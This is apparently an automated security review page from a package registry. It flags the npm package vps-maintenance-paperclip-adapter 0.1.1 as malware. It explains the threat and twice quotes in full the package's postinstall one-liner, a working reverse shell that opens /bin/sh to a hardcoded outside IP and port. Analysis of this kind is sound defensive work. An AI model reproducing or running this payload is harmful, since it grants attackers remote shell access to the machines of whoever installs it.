registry  /  vps-maintenance-paperclip-adapter  /  0.1.1

vps-maintenance-paperclip-adapter@0.1.1

Paperclip external adapter that runs maintenance shell commands on the Paperclip host VPS (or another machine over SSH)

AI Security Review

scanned 3h ago · by lpm-firewall-ai

The package has an unconditional npm postinstall reverse shell. Installing the package connects to a hardcoded IP and exposes /bin/sh over that socket.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
npm install / package installation lifecycle postinstall
Impact
Remote attacker can execute shell commands as the installing user on the host during installation.
Mechanism
install-time reverse shell via node net.connect and child_process.spawn('/bin/sh')
Attack narrative
On installation, npm runs package.json postinstall. That hook starts a Node one-liner, connects to 185.112.147.174:7007, spawns /bin/sh, and pipes the shell's standard streams to the socket. This grants interactive remote command execution before any legitimate Paperclip adapter use.
Rationale
Source inspection confirms a deterministic install-time reverse shell in package.json, independent of the documented adapter functionality. This is concrete malicious behavior with remote command execution on install.
Evidence
package.jsondist/index.jsdist/server/execute.jsdist/server/index.jsdist/server/config-schema.jsdist/server/test.jsdist/metadata.jsREADME.md
Network endpoints1
185.112.147.174:7007

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • package.json defines postinstall lifecycle hook executed on npm install.
  • postinstall opens TCP connection to 185.112.147.174:7007 using net.connect.
  • postinstall spawns /bin/sh and pipes stdin/stdout/stderr to the remote socket, creating a reverse shell.
  • The reverse shell is unrelated to the documented Paperclip adapter behavior in README.md and dist/*.js.
  • Runtime adapter command execution in dist/server/execute.js is user-configured, but the install hook is unconditional.
Evidence against
  • dist/index.js only exports metadata and createServerAdapter.
  • dist/server/execute.js runs configured commands through adapter-utils and supports documented SSH mode.
  • README.md documents a maintenance adapter that runs configured shell commands; it does not disclose install-time remote shell behavior.
  • rg found the hardcoded remote endpoint only in package.json postinstall.
Behavioral surface
Source
EnvironmentVars
Supply chain
HighEntropyStrings
ManifestNo manifest risk signals triggered.
scanned 6 file(s), 16.2 KB of source

Source & flagged code

2 flagged · loading source
package.jsonView file
scripts.postinstall = node -e "const c=require('net').connect(7007,'185.112.147.174');const p=require('child_process').spawn('/bin/sh',[]);c.pipe(p.stdin);p.stdout.pipe(c);p.stderr.pipe(c);"
Critical
Red Install Lifecycle Script

Install-time lifecycle script matches a deterministic static-gate block pattern.

package.jsonView on unpkg
scripts.postinstall = node -e "const c=require('net').connect(7007,'185.112.147.174');const p=require('child_process').spawn('/bin/sh',[]);c.pipe(p.stdin);p.stdout.pipe(c);p.stderr.pipe(c);"
High
Install Time Lifecycle Scripts

Package defines install-time lifecycle scripts.

package.jsonView on unpkg

Findings

1 Critical1 High2 Medium3 Low
CriticalRed Install Lifecycle Scriptpackage.json
HighInstall Time Lifecycle Scriptspackage.json
MediumEnvironment Vars
MediumStructural Risk Force Deep Review
LowNon Install Lifecycle Scripts
LowScripts Present
LowHigh Entropy Strings